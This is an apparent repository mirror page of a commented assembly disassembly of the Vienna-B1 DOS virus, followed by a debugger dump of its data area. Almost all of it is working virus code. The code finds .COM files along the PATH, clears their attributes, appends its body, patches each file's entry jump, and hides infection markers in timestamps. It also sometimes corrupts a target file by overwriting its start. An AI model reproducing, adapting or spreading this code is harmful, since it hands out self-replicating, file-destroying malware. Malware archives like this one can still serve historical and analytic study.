mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-26 03:55:06 +00:00
332 lines
14 KiB
NASM
332 lines
14 KiB
NASM
|
; disassembly of vienna-b1 virus
|
|||
|
|
|||
|
|
|||
|
jmp label1
|
|||
|
message:
|
|||
|
db "ello, world!$" ;*************
|
|||
|
mov ah,09h ;print string ; part of *
|
|||
|
mov dx,message ;point to string ; original *
|
|||
|
int 21h ;call msdos ; com file. *
|
|||
|
int 20h ;terminate program ;*************
|
|||
|
label1:
|
|||
|
push cx ;
|
|||
|
mov dx,0312h ;start of variables
|
|||
|
cld ;clear direction
|
|||
|
mov si,dx ;si = start of variables
|
|||
|
add si,000Ah
|
|||
|
mov di,0100h ;destination = 0100h
|
|||
|
mov cx,0003 ;three bytes to move
|
|||
|
repz movsb
|
|||
|
mov si,dx ;si = 0312h (start of variables)
|
|||
|
mov ah,30h ;get dos version number
|
|||
|
int 21h ;call msdos
|
|||
|
cmp al,00h ;old version?
|
|||
|
jnz label2 ;no
|
|||
|
jmp label3 ;yes
|
|||
|
label2:
|
|||
|
push es ;store extra segment
|
|||
|
mov ah,2fh ;get DTA address
|
|||
|
int 21h ;call msdos
|
|||
|
mov [si+0000h],bx ;save DTA offset
|
|||
|
mov [si+0002],es ;save DTA segment
|
|||
|
pop es ;restore extra segment address
|
|||
|
mov dx,005fh ;
|
|||
|
nop
|
|||
|
add dx,si ;pointer to new DTA address
|
|||
|
mov ah,1ah ;set DTA address
|
|||
|
int 21h ;call msdos
|
|||
|
push es ;save extra segment address again
|
|||
|
push si ;save source index register
|
|||
|
mov es,[002ch]
|
|||
|
mov di,0000h
|
|||
|
label4:
|
|||
|
pop si
|
|||
|
push si
|
|||
|
add si,001ah
|
|||
|
lodsb ;get byte from source address
|
|||
|
mov cx,8000h ;
|
|||
|
repnz scasb
|
|||
|
mov cx,0004h ;
|
|||
|
label7:
|
|||
|
lodsb ;get byte from source
|
|||
|
scasb ;store byte
|
|||
|
jnz label4 ;jump back till done
|
|||
|
loop label7
|
|||
|
pop si ;restore source index register
|
|||
|
pop es ;and extra segment
|
|||
|
mov [si+0016h],di
|
|||
|
mov di,si
|
|||
|
add di,001fh
|
|||
|
mov bx,si
|
|||
|
add si,001fh
|
|||
|
mov di,si
|
|||
|
jmp label5
|
|||
|
label13:
|
|||
|
cmp word ptr [si+0016h],00h
|
|||
|
jnz label5
|
|||
|
jmp label6
|
|||
|
push ds
|
|||
|
push si
|
|||
|
es mov ds,[002ch]
|
|||
|
mov di,si
|
|||
|
es mov si,[di+0016h]
|
|||
|
add di,001fh
|
|||
|
label10:
|
|||
|
lodsb ;get byte
|
|||
|
cmp al,3bh
|
|||
|
jz label8
|
|||
|
cmp al,00h
|
|||
|
jz label9
|
|||
|
stosb ;store byte
|
|||
|
jmp label10
|
|||
|
label9:
|
|||
|
mov si,0000h
|
|||
|
label8:
|
|||
|
pop bx
|
|||
|
pop ds
|
|||
|
mov [bx+0016h],si
|
|||
|
cmp byte ptr [di-01h],5ch
|
|||
|
jz label5
|
|||
|
mov al,5ch
|
|||
|
stosb ;store byte
|
|||
|
label5:
|
|||
|
mov [bx+0018h],di
|
|||
|
mov si,bx
|
|||
|
add si,0010h
|
|||
|
mov cx,0006h
|
|||
|
repz movsb
|
|||
|
mov si,bx
|
|||
|
mov ah,4eh ;search for first match
|
|||
|
mov dx,001fh ;pointer to asciiz file spec.-si
|
|||
|
nop
|
|||
|
add dx,si ;pointer to asciiz file spec.
|
|||
|
mov cx,0003h ;attribute to us in search match
|
|||
|
int 21h ;call msdos
|
|||
|
jmp label11
|
|||
|
label14:
|
|||
|
mov ah,4fh ;search for next match
|
|||
|
int 21h ;call msdos
|
|||
|
label11:
|
|||
|
jnb label12
|
|||
|
jmp label13
|
|||
|
label12:
|
|||
|
mov ax,[si+0075h]
|
|||
|
and al,1fh
|
|||
|
cmp al,1fh
|
|||
|
jz label14
|
|||
|
cmp word ptr [si+0079h],0fa00h
|
|||
|
ja label14
|
|||
|
cmp word ptr [si+0079h],0ah
|
|||
|
jb label14
|
|||
|
mov di,[si+0018h]
|
|||
|
push si
|
|||
|
add si,007dh
|
|||
|
label15:
|
|||
|
lodsb
|
|||
|
stosb
|
|||
|
cmp al,00h
|
|||
|
jnz label15
|
|||
|
pop si
|
|||
|
mov ax,4300h ;get file attributes
|
|||
|
mov dx,001fh ;pointer to asciiz file spec. -si
|
|||
|
nop
|
|||
|
add dx,si ;pointer to file spec.
|
|||
|
int 21h ;call msdos
|
|||
|
mov [si+0008h],cx
|
|||
|
mov ax,4301 ;set file attributes
|
|||
|
and cx,0fffeh ;new attributes
|
|||
|
mov dx,001fh ;pointer to asciiz file spec. -si
|
|||
|
nop
|
|||
|
add dx,si ;pointer to asciiz file spec.
|
|||
|
int 21h ;call msdos
|
|||
|
mov ax,3d02h ;open file (handle)
|
|||
|
mov dx,001fh ;pointer to asciiz file spec. -si
|
|||
|
nop
|
|||
|
add dx,si ;pointer to asciiz file spec.
|
|||
|
int 21h ;call msdos
|
|||
|
jnb label16
|
|||
|
jmp label17
|
|||
|
label16:
|
|||
|
mov bx,ax
|
|||
|
mov ax,5700h ;get time and date
|
|||
|
int 21h ;call msdos
|
|||
|
mov [si+0004],cx ;store time
|
|||
|
mov [si+0006],dx ;store date
|
|||
|
mov ah,2ch ;get system time
|
|||
|
int 21h ;call msdos
|
|||
|
and dh,07h
|
|||
|
jnz label18
|
|||
|
mov ah,40h ;write to file or device (handle)
|
|||
|
mov cx,0005h ;number of bytes to write
|
|||
|
mov dx,si ;get file spec. address -8ah
|
|||
|
add dx,008ah ;add 8ah to get file spec. address
|
|||
|
int 21h ;call msdos
|
|||
|
jmp label19
|
|||
|
nop
|
|||
|
label18:
|
|||
|
mov ah,3fh ;read file or device (handle)
|
|||
|
mov cx,0003h ;number of bytes to read
|
|||
|
mov dx,000ah ;point to buffer -si
|
|||
|
nop
|
|||
|
add dx,si ;pointer to buffer area
|
|||
|
int 21h ;call msdos
|
|||
|
jb label19
|
|||
|
cmp ax,0003h ;number of bytes read
|
|||
|
jnz label19
|
|||
|
mov ax,4202h ;move file pointer
|
|||
|
;offset from end of file
|
|||
|
mov cx,0000h ;offset desired
|
|||
|
mov dx,0000h ;as above
|
|||
|
int 21h ;call msdos
|
|||
|
jb label19
|
|||
|
mov cx,ax
|
|||
|
sub ax,0003h
|
|||
|
mov [si+000eh],ax
|
|||
|
add cx,02f9h
|
|||
|
mov di,si
|
|||
|
sub di,01f7h
|
|||
|
mov [di],cx
|
|||
|
mov ah,40h ;write to file or device (handle)
|
|||
|
mov cx,0288h ;number of bytes to write
|
|||
|
mov dx,si ;
|
|||
|
sub dx,01f9h ;dx = pointer to buffer of data write
|
|||
|
int 21h ;call msdos
|
|||
|
jb label19
|
|||
|
cmp ax,0288h ;288h bytes written?
|
|||
|
jnz label19
|
|||
|
mov ax,4200h ;move file pointer
|
|||
|
;offset from beginning of file
|
|||
|
mov cx,0000h ;desired offset
|
|||
|
mov dx,0000h ;desired offset
|
|||
|
int 21h ;call msdos
|
|||
|
jb label19
|
|||
|
mov ah,40h ;write to file or device (handle)
|
|||
|
mov cx,0003h ;number of bytes to write
|
|||
|
mov dx,si ;
|
|||
|
add dx,000dh ;pointer to buffer of data write
|
|||
|
int 21h ;call msdos
|
|||
|
label19:
|
|||
|
mov dx,[si+0006h]
|
|||
|
mov cx,[si+0004h]
|
|||
|
and cx,0ffe0h
|
|||
|
or cx,001fh
|
|||
|
mov ax,5701h ;set date and time
|
|||
|
int 21h ;call msdos
|
|||
|
mov ah,3eh ;close file
|
|||
|
int 21h ;call msdos
|
|||
|
label17:
|
|||
|
mov ax,4301h ;set file attributes
|
|||
|
mov di,[si+0008h]
|
|||
|
mov dx,001fh ;pointer to asciiz file spec. -si
|
|||
|
nop
|
|||
|
add dx,si ;pointer to ascii file spec.
|
|||
|
int 21h ;call msdos
|
|||
|
label6:
|
|||
|
push ds ;save data segment
|
|||
|
mov ah,1ah ;set DTA address
|
|||
|
mov dx,[si+0000] ;retrieve original DTA
|
|||
|
mov ds,[si+0002] ;and data segment of dta
|
|||
|
int 21h ;call msdos
|
|||
|
pop ds ;restore DTA
|
|||
|
label3:
|
|||
|
pop cx
|
|||
|
xor ax,ax ;clear accumulator
|
|||
|
xor bx,bx ;and bx
|
|||
|
xor dx,dx ;and dx
|
|||
|
xor si,si ;and si
|
|||
|
mov di,0100h ;pointer to execution program to be
|
|||
|
;run now virus has finished
|
|||
|
push di
|
|||
|
xor di,di ;clear di
|
|||
|
ret 0ffffh ;?
|
|||
|
|
|||
|
|
|||
|
|
|||
|
start_of_variables:
|
|||
|
0312 80003E ADD BYTE PTR [BX+SI],3E
|
|||
|
0315 40 inc ax
|
|||
|
0316 D592 AAD 92
|
|||
|
0318 8511 TEST dx,[BX+DI]
|
|||
|
031A 2000 AND [BX+SI],AL
|
|||
|
|
|||
|
031C EB0E JMP 032ch ;jump address to place at
|
|||
|
;beginning of source program
|
|||
|
031E 48 DEC ax
|
|||
|
031F E91600 JMP 0338
|
|||
|
db "*.COM"
|
|||
|
0327 0027 ADD [BX],ah
|
|||
|
0329 0022 ADD [BP+SI],ah
|
|||
|
032B 03
|
|||
|
db "PATH=DANGER!.COM EM.COM"
|
|||
|
032C 5041 ADD dx,[BX+SI+41]
|
|||
|
032E 54 push SP
|
|||
|
032F 48 DEC ax
|
|||
|
0330 3D4441 cmp ax,4144
|
|||
|
0333 4E DEC SI
|
|||
|
0334 47 inc DI
|
|||
|
0335 45 inc BP
|
|||
|
0336 52 push dx
|
|||
|
0337 212E434F AND [4F43],BP
|
|||
|
033B 4D DEC BP
|
|||
|
033C 00454D ADD [DI+4D],AL
|
|||
|
033F 2E CS:
|
|||
|
0340 43 inc BX
|
|||
|
0341 4F DEC DI
|
|||
|
0342 4D DEC BP
|
|||
|
0343 0000 ADD [BX+SI],AL
|
|||
|
0345 43 inc BX
|
|||
|
0346 4F DEC DI
|
|||
|
0347 4D DEC BP
|
|||
|
0348 0020 ADD [BX+SI],ah
|
|||
|
034A 2020 AND [BX+SI],ah
|
|||
|
034C 2020 AND [BX+SI],ah
|
|||
|
034E 2020 AND [BX+SI],ah
|
|||
|
0350 2020 AND [BX+SI],ah
|
|||
|
0352 2020 AND [BX+SI],ah
|
|||
|
0354 2020 AND [BX+SI],ah
|
|||
|
0356 2020 AND [BX+SI],ah
|
|||
|
0358 2020 AND [BX+SI],ah
|
|||
|
035A 2020 AND [BX+SI],ah
|
|||
|
035C 2020 AND [BX+SI],ah
|
|||
|
035E 2020 AND [BX+SI],ah
|
|||
|
0360 2020 AND [BX+SI],ah
|
|||
|
0362 2020 AND [BX+SI],ah
|
|||
|
1463:0364 2020 AND [BX+SI],ah
|
|||
|
1463:0366 2020 AND [BX+SI],ah
|
|||
|
1463:0368 2020 AND [BX+SI],ah
|
|||
|
1463:036A 2020 AND [BX+SI],ah
|
|||
|
1463:036C 2020 AND [BX+SI],ah
|
|||
|
1463:036E 2020 AND [BX+SI],ah
|
|||
|
1463:0370 2003 AND [BP+DI],AL
|
|||
|
1463:0372 3F AAS
|
|||
|
1463:0373 3F AAS
|
|||
|
1463:0374 3F AAS
|
|||
|
1463:0375 3F AAS
|
|||
|
1463:0376 3F AAS
|
|||
|
1463:0377 3F AAS
|
|||
|
1463:0378 3F AAS
|
|||
|
1463:0379 3F AAS
|
|||
|
1463:037A 43 inc BX
|
|||
|
1463:037B 4F DEC DI
|
|||
|
1463:037C 4D DEC BP
|
|||
|
1463:037D 0305 ADD ax,[DI]
|
|||
|
1463:037F 001F ADD [BX],BL
|
|||
|
1463:0381 0020 ADD [BX+SI],ah
|
|||
|
1463:0383 64 DB 64
|
|||
|
1463:0384 7269 JB 03EF
|
|||
|
1463:0386 20D5 AND CH,DL
|
|||
|
1463:0388 92 XCHG dx,ax
|
|||
|
1463:0389 8511 TEST dx,[BX+DI]
|
|||
|
1463:038B 1900 SBB [BX+SI],ax
|
|||
|
1463:038D 0000 ADD [BX+SI],AL
|
|||
|
1463:038F 44 inc SP
|
|||
|
1463:0390 41 inc cx
|
|||
|
1463:0391 4E DEC SI
|
|||
|
1463:0392 47 inc DI
|
|||
|
1463:0393 45 inc BP
|
|||
|
1463:0394 52 push dx
|
|||
|
1463:0395 212E434F AND [4F43],BP
|
|||
|
1463:0399 4D DEC BP
|
|||
|
1463:039A 0000 ADD [BX+SI],AL
|
|||
|
1463:039C EA0B021358 JMP 5813:020B
|
|||
|
|